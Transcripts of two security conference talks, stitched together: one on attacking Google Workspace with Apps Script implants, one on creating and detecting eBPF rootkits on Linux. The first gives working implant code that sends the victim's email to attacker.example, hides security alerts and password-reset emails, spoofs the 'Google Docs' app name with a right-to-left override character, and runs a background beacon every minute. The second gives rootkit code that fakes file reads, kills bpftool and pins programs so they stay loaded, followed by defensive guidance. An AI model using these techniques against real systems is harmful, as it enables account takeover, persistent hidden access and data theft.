And this is really nice because the victim doesn't even have to deliberately visit the URL in their web browser — they can visit a web page that simply has an image in it that links to this URL, and that works completely fine; the script will execute just from an image that links to it. The way you do this is you go to the deployments in your Apps Script, create a new deployment with deployment type "web app," and say that when people hit the endpoint you want it to run as the user who is accessing the web app, then deploy it. You get a nice little URL back, and that's what you can put inside an image tag, or otherwise get the victim to visit in their browser, and it will trigger the script to automatically run as them. Another useful technique for lateral movement inside a G Suite organization is enumerating and joining open Google Groups. Google Groups are used for ACLs both in Google Cloud — in GCP IAM settings — and for a variety of G Suite-style services, so they're used extensively in access control. In addition to that, by default, when you create a Google Group inside a G Suite org it's openly joinable by everybody internally. By themselves neither of those is an issue, but put them together and it's not so great: something used extensively for ACLs being, by default, wide open and insecure means anybody inside the company can join a group and gain the permissions of its ACL just by joining. That ends up being basically a factory for endless privilege escalation, so searching for and joining Google Groups is often a great way to escalate your privileges inside a G Suite organization. So what can be gated by Google Groups? Google Cloud and all the services under it — App Engine, Cloud Functions — but also things like Google Drive, Docs, Sheets, Google Calendar, Data Studio, and even G Suite admin ACL groups. They can even be used for things like publishing Chrome extensions. Most Google services have some sort of ACL integration with Google Groups, so there are tons of places to escalate your privileges. In the context of an Apps Script implant, though, modifying Google Groups via Apps Script is not as easy as it sounds. For some reason, unlike all the other Google services, the Google Groups API — known as the Directory API — is restricted to admins, so only G Suite admins can actually use it. But there's another API called the Cloud Identity API, and that one is available to all users, so your Apps Script implant can make use of it. It allows some access to Google Groups via the API: you can list all the Google Groups in an organization, list the members of groups and their roles, create your own Google Groups, update them, delete members, and generally manage the things you create.
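For the forced-retrigger trick, the web-app entry point is just a doGet handler. Below is a minimal sketch of what it might contain; the callback URL is a hypothetical placeholder, and the key property is the deployment setting "Execute as: user accessing the web app."

```javascript
// Sketch: web-app entry point used to force re-execution as any user who has
// already authorized the bound script. Deployed as a web app that executes as
// the accessing user, the /exec URL can be referenced from an image tag.
function doGet(e) {
  // Runs with the OAuth grants of whoever hits the URL.
  var victim = Session.getActiveUser().getEmail();
  UrlFetchApp.fetch('https://attacker.example/ping', {   // hypothetical endpoint
    method: 'post',
    payload: JSON.stringify({ user: victim, when: new Date().toISOString() }),
    muteHttpExceptions: true
  });
  // Return something innocuous so the request looks uninteresting.
  return ContentService.createTextOutput('ok');
}
```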
But unfortunately the one thing you cannot do via this API is join an open Google Group, which is super unfortunate. If you do have full access to the G Suite account, though, joining open Google Groups is a great way to escalate your privileges. Now that we've talked about escalation, let's talk about stealth and persistence. When you get access to a victim you don't want point-in-time access, you want persistent access so you can keep poking around inside the organization. We'll start off with some Gmail trickery. One of the things I recommend doing with your Apps Script implant, using its API access to Gmail, is creating filters in Gmail to hide security notifications — things like the emails that say "you just granted access to a new Google app." You can hide those from the user. You can also create a bunch of filters to hide password-reset emails: when an inbound password-reset email arrives, you can hide it in the trash or some other folder so the user never sees it. And since people's email accounts tend to be the center of all their security, you can later trigger resets for all their other accounts, use the Apps Script implant to pull the password-reset email, and get access to those accounts as well. Unfortunately, creating forwarding addresses and that sort of thing in Gmail can't be done via the API. But if you have full UI access to the victim's Gmail, you can do something called adding a forwarding address, and this is super useful for persisting access. The way it works is you set up an external mailbox — something at yahoo.com, whatever external address you like — and you can make it so that anything matching a given filter, or even every email they receive, automatically has a copy sent to that other mailbox. You can set it to either delete the original or just make a copy and not make any changes. It's a really good way to keep persistent access to their mail, even if your app ends up getting revoked or ripped out later on. Now, we talked earlier about that historical campaign that used an app named "Google Docs." Having a deceptive app name is quite useful. You can see in this little demo that if I try to set my Apps Script app name to "Google Docs," it won't actually do it for me: when I set the title of the project it basically denies it, because that's a misleading name and it figures you're trying to do something phishy, so it prevents you from setting an app name like that. And if you look at some of the other things they've implemented after that Google Docs worm came out...
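As a rough illustration of the filter trick, an implant with the Gmail settings scope might create a filter like the one below. The sender and subject strings are my guesses at what the notification emails look like, and the exact filter schema is from my reading of the Gmail API, so treat this as a sketch rather than the tool from the talk.

```javascript
// Sketch: using the Gmail API to bury security notifications in the trash.
// Assumes the scope "https://www.googleapis.com/auth/gmail.settings.basic".
function hideSecurityAlerts() {
  var filter = {
    criteria: { from: 'no-reply@accounts.google.com', subject: 'Security alert' },
    action:   { addLabelIds: ['TRASH'], removeLabelIds: ['INBOX', 'UNREAD'] }
  };
  UrlFetchApp.fetch('https://gmail.googleapis.com/gmail/v1/users/me/settings/filters', {
    method: 'post',
    contentType: 'application/json',
    headers: { 'Authorization': 'Bearer ' + ScriptApp.getOAuthToken() },
    payload: JSON.stringify(filter),
    muteHttpExceptions: true
  });
}
```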
All of the tricks people used with Unicode characters to make an app name look like an official Google product have been pretty well stripped out. They now have a good system for preventing names like "G00GLE Docs," and none of the whitespace tricks work anymore either. But I did find that you can use the magic of what's called the right-to-left override character. For those who aren't familiar, this is a Unicode character you can paste in, and all of the characters that come after it end up being rendered in reverse. So in this case I paste the character in and then type "Google Docs" backwards, and because the text is rendered right-to-left instead of left-to-right, it appears in the prompt as "Google Docs." We completely bypass the protection this way, and when the user goes to approve the app they just see "Google Docs," exactly as they did with the original Google Docs worm. The next thing we want is perpetual script execution — we want our script to keep access to the account, not just run once when it's authorized; we want to keep persistence so we can keep exploring the org and doing our thing. Apps Script has a really useful feature for this: time-based triggers, the cron-style mechanism I mentioned earlier, which allows for background execution on a schedule. A trigger can run as often as every minute, and it executes as whatever user was running the script that programmatically created the trigger. You can see some example code here that runs a function every minute or so. Now, if you read the Google documentation on this, it says that in order to run these background scripts you need to request a specific scope, script.scriptapp, and that causes an extra line to appear in the OAuth prompt saying "allow this application to run when you are not present" — explicitly warning the user that the app will run in the background, continuously, even after they've approved it once. It turns out this is more of a suggestion than a hard rule. You can create time-based triggers programmatically without declaring that scope: as long as you declare some other scope of any type — Google Drive, Gmail, whatever — and the user authorizes it, you can programmatically create time triggers and they will execute just fine. So you can persist indefinitely without any of those warnings being shown to the user. More of a guideline than a strict rule. We've covered a variety of topics here — how to pierce the perimeter, escalate privileges, pivot around, persist, and so on. So thank you all for taking the time to see my talk, and I'd be happy to answer any questions you have.
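For reference, creating such a background trigger programmatically looks roughly like this; the function name "beacon" and the tasking URL are illustrative, and per the talk this works even without declaring the script.scriptapp scope as long as some other scope was authorized.

```javascript
// Sketch: installing a minute-resolution background trigger from the implant.
function installBeacon() {
  ScriptApp.newTrigger('beacon')
      .timeBased()
      .everyMinutes(1)
      .create();
}

function beacon() {
  // Runs in the background as the authorizing user, e.g. polling for tasking.
  UrlFetchApp.fetch('https://attacker.example/tasking', { muteHttpExceptions: true });
}
```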
|
You’ve seen plenty of talks on exploiting, escalating, and exfiltrating the magical world of Google Cloud (GCP), but what about its buttoned-down sibling? This talk delves into the dark art of utilizing Apps Script to exploit G Suite (AKA Google Workspace). As a studious sorcerer, you’ll discover how to pierce even the most fortified G Suite enterprises. You’ll learn to conjure Apps Script payloads to bypass powerful protective enchantments such as U2F, OAuth app allowlisting, and locked-down enterprise Chromebooks. Our incantations don’t stop at the perimeter, we will also discover novel spells to escalate our internal privileges and bring more G Suite accounts under our control. Once we’ve obtained the access we seek, we’ll learn various curses to persist ourselves whilst keeping a low profile so as to not risk an unwelcome exorcism. You don’t need divination to see that this knowledge just might rival alchemy in value. REFERENCES: No real academic references, this is all original research gleaned from real-world testing and reading documentation.
|
10.5446/54225 (DOI)
|
Good day everyone, my name is Pat — I'm pathtofile on Twitter, GitHub, Discord and most other places. This talk is about creating and countering the next generation of Linux rootkits using eBPF. Today we're going to start with an overview of what Linux kernel rootkits are, and we'll cover why rootkits are such a powerful tool for attackers but also why they're so dangerous to use. Next we're going to introduce eBPF and discuss how it can give an attacker all the best parts of a kernel rootkit without any of the risks. Then finally we're going to cover how to detect and prevent eBPF-based rootkits before they take over as the preferred rootkit type for attackers. So firstly, what are kernel rootkits? Once an attacker compromises a machine, they're going to want to maintain that access. Perhaps they exploited a vulnerability in a web application or used some stolen credentials. Those holes can be closed, and when they are, the attacker wants a way to regain access to that machine, preferably with root privileges and preferably in a way that is undetectable to security systems or system administrators. This is the role of a rootkit, and in terms of access there's no better place to put a rootkit than in the kernel. When a program wants to list the files in a directory, it uses a syscall to ask the kernel to read that data from the hard drive on its behalf. If a rootkit can hook or intercept this call, it can simply remove any sensitive file from the directory listing before passing the listing back to the program. The same technique can be used to hide files, processes, network connections — really anything — from user-space programs. By living in the kernel, the rootkit also has the ability to tap into all network traffic before any firewall, and it can launch processes with root privileges or alter the privileges of existing processes. This all sounds incredibly useful for an attacker, so what's the problem? By running code in the kernel, it's very easy to turn a small mistake into a very big problem. There aren't any guardrails or safety nets in the kernel. Once code is running there, it has the ability to read and write almost anything, which means that if there's a bug in your code and you write to the wrong part of memory, you're likely to crash the kernel — and if you crash the kernel, you crash the entire system. It could be even worse: if the kernel happened to be writing to a hard drive when you broke things, you could end up corrupting that disk, effectively breaking the entire system. Doing so will almost certainly bring in administrators and incident responders to determine what happened, so this is far from an ideal outcome for an attacker. Even if the rootkit developer is very careful, a kernel update can alter what a hooked function or a kernel object looks like, and all of this increases the likelihood of a disaster occurring. This means a rootkit developer often has to test the rootkit against every single kernel version it's planned to be deployed on. So the good parts of kernel rootkits sound really good for an attacker, but the risks are often too high to make them viable. If only there was a way to keep all the advantages of a kernel rootkit but have the safety and portability of a user-space program. So, how about we add JavaScript-like capabilities to the Linux kernel?
Now to some people that quote might sound like the wildest thing they've ever heard, but when Thomas Graf from Isovalent made it, he wasn't talking about literally putting JavaScript in the kernel. What he was talking about was introducing a way to run a certain type of code that has the visibility of the kernel but the ease, safety, and portability of user-space systems such as JavaScript programs. And what he was really talking about was eBPF. So what is eBPF? eBPF stands for extended Berkeley Packet Filter, but it has grown so much from the original BPF, particularly in the last two years, that any comparison to the classic version isn't really relevant today. It's a system within the Linux kernel that allows you to create programmable trace points known as eBPF programs. These programs can be attached to network interfaces to observe network traffic, to the entry or exit points of kernel functions including syscalls, and they can even be attached to user-space programs and functions. If that sounds like the same places as our kernel rootkit, you'd be correct — but unlike the kernel rootkit, eBPF programs are guaranteed to be safe from crashing the system, and they're even portable across kernel versions and system architectures. To explain how eBPF achieves this, let's look at how eBPF programs get written and loaded. We'll start with writing the eBPF program. These are typically written in a restricted version of C or in Rust, and there's an example of one in the bottom left. The programs have variables, loops, if statements — all the standard parts of the language — but they're heavily restricted in what external functions they can call, limited to a set of BPF helper functions. Instead of compiling this code into native assembly, eBPF programs get compiled into what's called BPF bytecode, which is a fairly simple, straightforward instruction set. The most important thing about this is that the BPF bytecode is independent of the architecture or kernel version it was compiled on. Once the bytecode has been compiled, it's ready to be sent to the kernel. The code is sent to the kernel using a user-space program called a loader, which makes use of the bpf syscall. Now, technically, non-root users can load some eBPF programs on some kernel configurations, but those programs are extremely limited in what they can do, so they're out of scope for this talk; for our purposes, loading has to be done by the root user or a system administrator. The kernel doesn't just blindly trust this bytecode: it runs what's called the BPF verifier, which checks every branch and every possible value of every variable in the code to make sure it isn't doing things such as reading invalid memory, slowing the system down by being too big or complex, or anything else that might cause the kernel to crash. This is where eBPF gets its safety guarantee, because only code that passes all of the verifier's extensive checks is allowed to be loaded and run. Once code has passed the verifier, the kernel runs a compiler to convert the bytecode into the native instructions that match that machine's architecture and kernel version — so on an x86 machine it compiles to x86, on an ARM machine it compiles to ARM, for example.
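To give a feel for the restricted-C style described here, below is a minimal sketch in the common libbpf layout: a tracepoint program that logs the filename passed to openat. It's illustrative only — built with clang targeting BPF and loaded by a separate user-space loader — not the example from the speaker's slides.

```c
// Minimal sketch of an eBPF program in restricted C (libbpf style):
// attach to the openat syscall tracepoint and log the requested filename.
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_openat")
int trace_openat(struct trace_event_raw_sys_enter *ctx)
{
    char filename[64];

    // args[1] is the const char *filename argument of openat(2).
    bpf_probe_read_user_str(filename, sizeof(filename), (void *)ctx->args[1]);
    bpf_printk("openat: %s", filename);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";
```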
By running as native instructions, eBPF code can run as fast and efficiently as regular kernel code on that machine. But that's not all the compiler does: it also dynamically looks up the addresses of the BPF helper functions and any kernel objects the code uses, and it patches the instructions to match that specific kernel version. This is why the code can be portable — the compilation step knows exactly what those helper functions and objects look like for that particular kernel, and by patching the instructions as it compiles, it produces code specifically tailored to that system. Once the programs are compiled, they're attached to the network interface or kernel function they target, where they run once for every packet or function call. Programs can't retain state from one run to the next, but they can make use of a global key-value store called an eBPF map: a program can store its state there between runs, read it back the next time it runs, and pick up where it left off. That's an extremely quick overview of what eBPF is — I'll have links to much more in-depth documentation at the end — but for now I want to get into what an attacker with the privileges to load and run eBPF programs can do, and how they can use it to achieve the same rootkit functionality as a regular kernel rootkit. The first thing we'll cover is using eBPF to warp the network reality. Here's a diagram of a fairly standard web server setup. It has two network interfaces: on the left is the internet-facing interface, where a firewall only allows traffic to and from a website listening on, say, port 443. On the right is the administrators' access, via a separate network interface attached to an internal VPN network. An SSH server is listening on this internal side, and when administrators want to access the machine they go through the internal network and SSH in. To make things interesting, let's say this SSH connection requires multi-factor authentication. An attacker who's gained access to this machine will probably want the ability to connect in from the internet, but they still want the same privileged access to the host that seems to be limited to the internal VPN side. eBPF programs have the ability to read and write all network packets across all interfaces, before the firewall has the ability to block the connection. What this means is that if a connection comes in from the attacker's IP address — even to a closed port — from the internet, eBPF can alter both the destination and source IP addresses and ports to make it look like the traffic is coming from a fake IP address that matches the internal VPN side. It can then route the traffic into the internal interface, into the SSH service, and from SSH's perspective this looks like just a regular connection from the internal systems.
And it's not only SSH that sees this traffic as normal: if an administrator uses tools such as Wireshark, netstat, or tcpdump, then from the perspective of those tools the network connection also appears to come only from the fake IP address on the internal network, with no indication that it's actually being routed in from the internet. That isn't the only tactic eBPF can employ. Because it can read and write network packets before any other system sees them, it has the ability to receive command-and-control data even on a port nothing is listening on, and then silently drop those packets so no security system ever knows that C2 data reached the machine. And while eBPF cannot create its own connections, it can clone existing packets: it could clone some legitimate traffic going to the website, alter the destination IP address to be the attacker's IP address, rewrite the data inside the packet to be whatever it wants, and send it off to the attacker. That technique can be used to exfiltrate arbitrary data from the machine. Finally, eBPF programs can be attached to user-space programs — for example, attached to the web server and hooked into the functions that do the TLS encryption and decryption for the website. We'll explain how that function hooking works in more detail in the next section, but what it enables is for eBPF to change the data underneath the encrypted TLS connection, so that even an external network monitor only sees legitimate TLS traffic going to and from the website, with no idea that eBPF might be reaching underneath the TLS and swapping the website's data out for data exfiltrated from the system. Altering data on the network is only one type of malicious behaviour eBPF can perform. Its real strength lies in its kernel function hooking and syscall interception, because that ability lets it warp reality around files, processes, and even users. Going back to our SSH example: it's not enough just to be able to connect to the service. If logging on requires a valid password and multi-factor authentication, it's unlikely an attacker will be able to easily log on. But what if there was a way to make SSH ignore that multi-factor requirement — or even the username and password requirement — and just allow anybody to log on to the system? SSH knows there are extra requirements such as multi-factor because of configuration files in the /etc/pam.d folder, and when it authenticates a username and password it looks inside the /etc/passwd and /etc/shadow files to make sure the supplied credentials are correct. So is there a way eBPF can lie about the contents of all of these files? Yes — and to explore how, let's first quickly revisit how user-space programs read files using syscalls. When a process wants to read a file, it actually makes two syscalls to the kernel. The first is open, or openat, which checks that the file the program wants to open actually exists and that the user wanting to read it is actually allowed to do so.
If they are, the kernel returns what's called a file descriptor number, or fd number, which is simply a reference to that file for that process. The process then makes a second syscall, this time to read, asking the kernel to read the file that matches the supplied fd number it got from the open call, and it gives the kernel a memory buffer to fill in with the file's contents. The kernel looks up that fd number, makes sure it's valid, grabs the file, and copies the file's data into that process's buffer before returning to the user-space process. What this means is that with four different eBPF programs we can observe what's going on — we can watch what is sent both to and from these two sets of syscalls. We're able to track which fd number corresponds to which file name, and we can even read the data contained in the file before the user-space program does, by reading the contents of the buffer after the read syscall has exited — that's the eBPF program at the bottom. But reading buffers isn't the only thing eBPF can do; it can also write to them. Let's look at this basic example. On the left is a very simple user-space program: it opens a file called readme and then asks the kernel, using the read syscall, to read the data from that file into a buffer called buffer. On the right is the eBPF program attached to the exit of the read syscall. So after the file has been opened and the user-space program asks the kernel to read it, the kernel reads the file into the buffer — but before the user-space program gets control again, our eBPF program runs. You can see at the start of this program that it uses the bpf_probe_read_user function to read the contents of that buffer, which at this stage contains the file data. But there is also a bpf_probe_write_user function. That allows us to alter the data within that buffer and write it back into user-space memory before the user-space program sees it. So once the eBPF program exits and control returns to the user-space program, the program thinks the buffer contains the file's data when in actuality it contains the fake data placed there by eBPF. This bpf_probe_write_user call can be used to overwrite any user-space buffer, pointer, or string that gets passed into or out of syscalls or kernel functions — things like changing which program gets launched by execve, or reading and altering netlink data; heaps of different things become possible with this call. Another thing eBPF can do is bypass the syscall altogether and instead just pretend the function ran, returning an arbitrary error code or return value. This can be done using the fmod_ret type of eBPF program, which, while it can't be attached to every function, can be attached to every syscall, at least on newer kernels. For example, the program in the top right simply pretends to write to a file: it returns the expected success code indicating the file was written, but the file is never actually written and the write syscall is never actually called. Now, if the goal is to prevent a process from discovering or stopping the rootkit, a more drastic option can be to simply kill the process.
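To make the buffer-overwriting idea concrete before moving on, here is a rough sketch of the read-hook pair just described: remember the user buffer pointer at the entry of read(2), then overwrite part of it at exit with bpf_probe_write_user. It's illustrative only — a real rootkit would also match the fd against a target file and filter by process, which is omitted here — and the fake string is just for demonstration.

```c
// Sketch of the read-exit overwrite technique (not the released bad-bpf code).
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 1024);
    __type(key, __u64);    // pid_tgid
    __type(value, __u64);  // user buffer address
} bufs SEC(".maps");

SEC("tracepoint/syscalls/sys_enter_read")
int enter_read(struct trace_event_raw_sys_enter *ctx)
{
    __u64 id = bpf_get_current_pid_tgid();
    __u64 buf = (__u64)ctx->args[1];   // second argument: user buffer pointer
    bpf_map_update_elem(&bufs, &id, &buf, BPF_ANY);
    return 0;
}

SEC("tracepoint/syscalls/sys_exit_read")
int exit_read(struct trace_event_raw_sys_exit *ctx)
{
    __u64 id = bpf_get_current_pid_tgid();
    __u64 *bufp = bpf_map_lookup_elem(&bufs, &id);
    char fake[] = "this is fake data\n";

    if (bufp && ctx->ret >= (long)sizeof(fake))
        // Replace the start of what the application is about to see.
        bpf_probe_write_user((void *)*bufp, fake, sizeof(fake));

    bpf_map_delete_elem(&bufs, &id);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";
```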
By using the bpf_send_signal helper function, the program can send an unblockable SIGKILL signal, which immediately instructs the kernel to start tearing down that process regardless of whether it wants to stop or not. That's a pretty drastic action that would probably be noticed, but it's certainly a possible way to prevent an action from occurring. Of course, killing every process that attempts to open any file is a quick way to have a really bad time, so thankfully eBPF programs have lots of ways to tailor an action based on who or what is performing it. They can behave differently based on the process name, the user ID, the values of arguments being passed to or returned from a function, and they can even take cues from other eBPF programs — for example, only start tampering with reads of a file after a connection from a specific IP address has occurred. Looking back at our SSH example: to bypass multi-factor, eBPF can simply overwrite the data being read from the PAM configuration files to remove any mention of multi-factor. It could then even overwrite the data read from /etc/passwd and /etc/shadow to insert a fake user account and password, which would enable logging into the machine with a completely fake set of credentials. By having eBPF target only the SSH process, an administrator using tools like cat or vim, a security tool, or even file forensics looking at the actual file on disk will all see only the normal, unedited file. Only SSH is presented with the warped-reality version of the data. So now it's time for some demos. The first demonstration we're going to go through is the ability to replace text within arbitrary files. You can see in the shell on the top right that there's a folder with a file called "file", and when we look inside it we see the text "this is real data". Now we load the first of our eBPF rootkits in the shell on the left. This rootkit looks for any process opening a file named "file" and replaces any data containing the text "real" with the word "fake". But it doesn't affect every process — it only affects children of one specific process ID, which matches our shell on the right. So we start the rootkit, and now, back in that shell, when we read the file we can see the data has changed: it says "this is fake data". In fact, the log from the rootkit shows that it detected that process — cat — starting and replaced the text that process read. What's interesting is that the shell on the bottom right is a different shell with a different process ID, and even though it's in the same folder looking at the same file, it sees the unaltered data. This is a technique with many, many uses. The example we used earlier in the presentation is that this is how you can add a user to /etc/passwd, but only for an SSH process, and not for any auditing software or a system administrator looking at that file. The next demonstration we're going to go through is the ability to stealthily enable a user to use sudo to become root.
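For the kill-based self-protection idea, something like the following is a plausible shape: when a process named bpftool makes the bpf() syscall (for example, to list loaded programs), it gets an unblockable SIGKILL. This is a simplified guess at the behaviour shown in the later demo, not the released code.

```c
// Sketch: SIGKILL any process named "bpftool" that calls the bpf() syscall.
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_bpf")
int protect_rootkit(struct trace_event_raw_sys_enter *ctx)
{
    char comm[16];
    const char target[] = "bpftool";

    bpf_get_current_comm(comm, sizeof(comm));
    for (int i = 0; i < sizeof(target); i++)   // compare including trailing NUL
        if (comm[i] != target[i])
            return 0;

    bpf_send_signal(9);   // SIGKILL cannot be caught or ignored
    return 0;
}

char LICENSE[] SEC("license") = "GPL";
```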
Normally on this machine — looking at the shell on the bottom right, which is running as the user lowpriv — if lowpriv wanted to become root using sudo, well, we can see lowpriv isn't allowed to in the sudoers file. In fact, using the root shell on the top right, we can doubly and triply confirm that lowpriv is not on that list. First we can use sudo -l to ask what privileges sudo believes this user has, and when we run it, it says user lowpriv is not allowed to run sudo. At the most basic level we can also just read the /etc/sudoers file and look for the user lowpriv, and sure enough, that user is not in there. So lowpriv is definitely not able to become root using sudo. That is, until we run the second of our eBPF rootkits on the left. This one looks for any time sudo, specifically, tries to open the /etc/sudoers file, and it alters the text in that file to say that lowpriv is in there and does have those privileges. But it only does this not just when sudo is running, but only when sudo is being run by lowpriv. Now that the rootkit has started, if lowpriv uses sudo again and runs whoami — look at that, it can become root. In fact, it didn't even need to enter a password. How does that work? If, as lowpriv, we now ask sudo what privileges it thinks we have, it says lowpriv has the ability to do anything, without even needing to add a password. But even with this rootkit running, if we check those permissions as a different user it still says lowpriv isn't allowed, and if we check the file it still shows that lowpriv is not in there. So the file is only altered when it's a sudo process, and only when that sudo process is being run by the lowpriv user. The last example we're going to go through is the ability to kill arbitrary processes, as a sort of self-protection. Typically an administrator can use a tool called bpftool, which lists the eBPF programs running on the system — for example, we can see a lot of eBPF programs related to systemd currently running on this machine. bpftool has the ability to list the running programs, dump out their instructions, and even show which process IDs are related to each eBPF program. So it's a good way for an administrator to see what eBPF programs are running and potentially discover something like an eBPF rootkit. Now we load up a rootkit on the left, and if we attempt to use bpftool to list the programs, the process just gets killed before that information appears. This is pretty extreme, but it demonstrates that eBPF has the ability to protect itself by killing any process attempting to do any sort of investigation. So now let's cover some other features of eBPF and then get into some of its limitations. There are three features we haven't covered yet that are definitely worth mentioning. Firstly, on some network cards you can actually run the eBPF programs on the network hardware itself instead of in the kernel.
For regular developers this is great because it can drastically increase packet processing speeds, but from a rootkit perspective it's interesting to note for another reason: any packet alteration made by an eBPF program running on the network card happens after the Linux kernel has potentially scanned that packet for anything malicious. So if you want to send a packet to a malicious IP address, you can send it to a benign IP address, and only once it's left the kernel and is inside the network card do you alter it to the dodgy IP address — any security system running in the kernel won't see that alteration. Secondly, up until recently, eBPF programs attached to kernel functions or syscalls required their user-space loader to continue running once the programs were up; in fact, if the loader exited, the kernel would assume you also wanted to stop the eBPF programs and would shut them down. Newer kernels have introduced the fentry and fexit types of BPF program, which can be pinned to the /sys/fs/bpf folder. What this means is that a special file gets created under that folder, one for each BPF program, and for as long as that file remains there, the loader is free to exit, delete itself, be completely removed, and the eBPF programs will continue to run. When you want to stop them, you just delete the files. Finally, it's worth mentioning that while the BPF verifier puts strict limits on how complex an individual eBPF program can be, there's a mechanism to chain multiple programs together using a helper function called bpf_tail_call. This requires some preparation and makes use of those eBPF maps I mentioned, but the end result is that the system as a whole can be much more complex than a single eBPF program is allowed to be. For example, on the right are the call graphs of four different eBPF programs that together make up just one half of the text-replacing rootkit we just demonstrated. Each individual program is pushing the limit of what a single eBPF program is allowed to do, but combined, the system as a whole can be much, much more complex. Now, there are a number of limitations to writing a rootkit using eBPF. The first is that when using bpf_probe_write_user to overwrite a buffer, there is a small window of time between when the syscall fills the data into the buffer and when eBPF overwrites it. That window doesn't matter for single-threaded programs, because execution won't return to the user-space program until after eBPF has done its thing, but in a multi-threaded program a second thread could be constantly reading the contents of that buffer and actually see the true data from the syscall before eBPF has a chance to tamper with it. The first major issue with using eBPF as a rootkit is that programs don't persist across a reboot. When the machine restarts, the user-space loader needs to run again to load and attach all those eBPF programs back into the kernel. The second major issue is that eBPF programs can't write to kernel memory, because that would almost certainly break eBPF's safety guarantees.
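As a sketch of the pinning trick, a loader built on libbpf could look roughly like this; the object file, program name, and pin path are placeholders, and the calls are libbpf functions I believe exist with these signatures.

```c
// Sketch: a loader that pins its attachment so the program outlives the loader.
#include <bpf/libbpf.h>
#include <stdio.h>

int main(void)
{
    struct bpf_object *obj = bpf_object__open_file("rootkit.bpf.o", NULL);
    if (!obj || bpf_object__load(obj))
        return 1;

    struct bpf_program *prog =
        bpf_object__find_program_by_name(obj, "exit_read");  // placeholder name
    struct bpf_link *link = bpf_program__attach(prog);
    if (!link)
        return 1;

    // As long as this pin file exists, the program stays attached even after
    // this process exits and removes itself from disk.
    if (bpf_link__pin(link, "/sys/fs/bpf/totally_legit"))
        return 1;

    printf("pinned; loader can now exit\n");
    return 0;
}
```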
What this means is that if a security tool is running in the kernel, such as auditd or a Linux Security Module, it's going to be unaffected by eBPF's tampering. One thing to note, though, is that while a security product might be running in the kernel, it's usually administered by user-space tools. So if a rootkit were able to disable the security tool in the kernel but then lie to the user-space controller about the current running status of the system, that might be enough to fool the system into thinking it's more secure than it actually is. Okay, let's talk about the defensive side of things, starting with file forensics. If you're looking to detect files that contain eBPF code, there are a couple of things to think about. For starters, the file generated by the compiler when compiling a program to BPF bytecode is actually an ELF file, where the bytecode lives inside a named section. That means tools such as readelf or objdump can be used to parse these files and extract the BPF bytecode. For example, the eBPF program on the top right is attached to the execve tracepoint (tp/syscalls/sys_enter_execve). When this gets compiled, that attach point becomes the name of the section inside the ELF that contains the raw bytes, so you can use a tool to read that section and extract the BPF bytecode. It's important to note that this is just the object from the compiler, not the user-space loader — what gets sent to the kernel is only the BPF bytes. It's also worth noting that a lot of loaders are written using the libbpf library, because it's part of the Linux source tree and makes it a lot easier to read, write, and manage eBPF programs. If a loader uses libbpf, the library will actually embed the entire ELF object from the compiler inside the user-space loader, so you end up with an ELF inside an ELF. If you want to extract the bytecode from one of those, you first need to look in the read-only data of the loader, pull the embedded ELF out of there, and then parse that to find the correct section containing the BPF bytecode. Once you do extract the bytecode, the biggest thing to look for is evidence of the bpf_probe_write_user function. It might be more difficult to automatically tell whether a network-packet-altering program is malicious or not, but I can't imagine too many legitimate use cases for bpf_probe_write_user. Now, I haven't touched at all on what BPF bytecode instructions actually look like, but the call instruction that comes out of the compiler is what's shown in the example on disk: the opcode byte is 0x85, and the immediate value 0x24 matches the bpf_probe_write_user helper. But remember that the bytecode is architecture and kernel version agnostic, so when it gets sent into the kernel, the kernel patches that 0x24 to match the correct address for that kernel. If you're looking at the bytecode stored inside the kernel, you would then need to dynamically look up that memory address to determine that it is the probe_write_user function. And if you're looking at the native code after the JIT compiler inside the kernel, it's definitely just going to look like a regular call instruction.
So again you would need to dynamically look up that memory address to determine that it's the probe_write_user function. To protect a running system, I think one of the strongest defenses is to monitor the bpf syscall — you can use eBPF to monitor eBPF. Monitoring which programs are loading and running eBPF programs is a really good tactic, because realistically there should only be a small number of known programs actually interacting with eBPF. If a program does look suspicious, then because eBPF has intercepted the syscall you can extract that program's bytecode and send it somewhere else to be analyzed, where you can look for suspicious behaviour in the code. Now, a lot of the defenses I've covered so far assume that an eBPF rootkit is not already installed and tampering with the system — because if it is already running, it would have the ability to block or hide the user-mode processes that are scanning files or attempting to load an eBPF program. But even kernel rootkits have a hard time hiding from memory forensics, particularly if the machine is virtualized, where memory can be acquired from underneath the kernel at the hardware, hypervisor, or physical level. Volatility is the name of an excellent memory forensics tool, and in fact at this year's Black Hat the team is releasing some new plugins specifically around acquiring and analyzing Linux tracing forensics. As I'm pre-recording this talk I don't know exactly what they're going to cover, but I did speak briefly with a number of the team members before recording, and I'm really excited to get my hands on the plugins they're producing, because they sound incredibly interesting. One final prevention could be to just disable any use of eBPF within the kernel. This requires recompiling the kernel with the relevant flags disabled, and by doing so you'd lose all the advantages of using eBPF for your own purposes, but it's definitely an option for some. Additionally, at the moment there are discussions going on within the community about how to cryptographically sign eBPF programs, in the same way you can sign kernel modules. Doing so would allow a system to load only trusted eBPF programs and prevent unknown or untrusted programs from being loaded and used. Implementing this is definitely non-trivial, particularly due to that compilation step, but some smart people are really looking at it, so in the future this may end up being the best defense against eBPF-based rootkits. Okay, before we finish: what else can eBPF do? Firstly, eBPF now runs on Windows. In May, Microsoft released the start of a project on GitHub called eBPF for Windows. It's in the early stages at the moment — it only has the network observability side of things, not the function or syscall hooking — but a lot of people, including myself, are really interested in seeing how the project evolves. So if you're interested in Windows at all, I'd highly recommend checking it out. Another thing I want to mention is that warping reality isn't just for attackers. The same ideas around altering file or network data are also incredibly useful to reverse engineers, either doing malware analysis or even bug hunting.
